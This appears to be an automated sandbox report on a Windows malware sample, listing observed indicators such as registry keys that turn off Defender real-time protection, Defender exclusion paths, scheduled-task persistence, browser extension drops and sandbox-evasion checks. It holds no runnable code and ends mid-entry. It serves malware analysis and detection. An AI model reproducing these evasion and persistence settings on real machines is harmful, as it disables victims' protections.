Analysis
-
max time kernel
90s -
max time network
91s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04-06-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe
Resource
win7-20240221-en
General
-
Target
987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe
-
Size
6.3MB
-
MD5
2570433695e66597cf18a2d427c5366d
-
SHA1
88c9e4e3d7562c2b538b19066ceffd3bd2b80da1
-
SHA256
987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236
-
SHA512
cf220112dba66758512dcc0a37df298d25ab1c5390eb45826aee9690907ad9c94a3e6272419e1bd0c64a6af518b4945336f21aa8822e6cdfc545a604d7a578b6
-
SSDEEP
98304:91Oih9g3v564EOC2yQlQyNky6wJ9cpq5rMlGRrodUkZ+52LYib/Z6fm1xE:91Oyif5sH6QyayJ6GFodL+52LNFE
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 24 2016 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpid process 1752 powershell.EXE 556 powershell.exe 1556 powershell.exe 2636 powershell.exe 2304 powershell.exe 296 powershell.EXE 1636 powershell.exe 2644 powershell.exe 2084 powershell.exe 1060 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
IOqIorP.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\International\Geo\Nation IOqIorP.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeFfKflKD.exeIOqIorP.exepid process 2776 Install.exe 2104 FfKflKD.exe 1600 IOqIorP.exe -
Loads dropped DLL 19 IoCs
Processes:
987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exeInstall.exeWerFault.exerundll32.exeWerFault.exeWerFault.exepid process 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe 2776 Install.exe 2776 Install.exe 2776 Install.exe 2292 WerFault.exe 2292 WerFault.exe 2292 WerFault.exe 2016 rundll32.exe 2016 rundll32.exe 2016 rundll32.exe 2016 rundll32.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2780 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
IOqIorP.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json IOqIorP.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json IOqIorP.exe -
Drops file in System32 directory 27 IoCs
Processes:
FfKflKD.exepowershell.EXEIOqIorP.exepowershell.EXEpowershell.exepowershell.exerundll32.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol FfKflKD.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 IOqIorP.exe File created C:\Windows\system32\GroupPolicy\gpt.ini FfKflKD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FfKflKD.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 IOqIorP.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 IOqIorP.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 IOqIorP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IOqIorP.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IOqIorP.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini FfKflKD.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F IOqIorP.exe -
Drops file in Program Files directory 13 IoCs
Processes:
IOqIorP.exedescription ioc process File created C:\Program Files (x86)\hsUwQAlMU\LaAZwT.dll IOqIorP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IOqIorP.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\zKIdGvm.xml IOqIorP.exe File created C:\Program Files (x86)\ZEkGlaTFWGUn\mvftUlS.dll IOqIorP.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\FpChnlL.dll IOqIorP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IOqIorP.exe File created C:\Program Files (x86)\dlfHiRefefjU2\zLKaBAhZbwwTl.dll IOqIorP.exe File created C:\Program Files (x86)\dlfHiRefefjU2\MrbggDq.xml IOqIorP.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\vFloWYX.xml IOqIorP.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IOqIorP.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IOqIorP.exe File created C:\Program Files (x86)\hsUwQAlMU\hJTohrj.xml IOqIorP.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\oBeJAaM.dll IOqIorP.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2292 2104 WerFault.exe FfKflKD.exe 2668 1600 WerFault.exe IOqIorP.exe 2780 2776 WerFault.exe Install.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2320 schtasks.exe 808 schtasks.exe 1572 schtasks.exe 572 schtasks.exe 1540 schtasks.exe 1832 schtasks.exe 1588 schtasks.exe 3032 schtasks.exe 2816 schtasks.exe 2372 schtasks.exe 2188 schtasks.exe 1972 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
IOqIorP.exewscript.exerundll32.exeFfKflKD.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\WpadDecisionReason = "1" IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed IOqIorP.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached FfKflKD.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\WpadDecisionTime = d07d35ef1db6da01 IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs IOqIorP.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54\WpadDecisionTime = d07d35ef1db6da01 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b06775c71db6da01 FfKflKD.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" FfKflKD.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs IOqIorP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54 IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs IOqIorP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ FfKflKD.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\WpadNetworkName = "Network 3" IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\26-20-6e-1f-74-54 IOqIorP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54\WpadDecisionReason = "1" IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople IOqIorP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs IOqIorP.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot IOqIorP.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54\WpadDecisionTime = d07d35ef1db6da01 IOqIorP.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\26-20-6e-1f-74-54 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\26-20-6e-1f-74-54 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" IOqIorP.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3} IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs IOqIorP.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" FfKflKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B8C57856-3E1E-4F8F-BCB5-470C026DA9F3}\WpadDecision = "0" IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings IOqIorP.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs IOqIorP.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates IOqIorP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates IOqIorP.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exeIOqIorP.exepowershell.exepid process 2644 powershell.exe 2644 powershell.exe 2644 powershell.exe 2636 powershell.exe 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 296 powershell.EXE 296 powershell.EXE 296 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 1752 powershell.EXE 2084 powershell.exe 1060 powershell.EXE 1060 powershell.EXE 1060 powershell.EXE 556 powershell.exe 556 powershell.exe 556 powershell.exe 1636 powershell.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1556 powershell.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe 1600 IOqIorP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
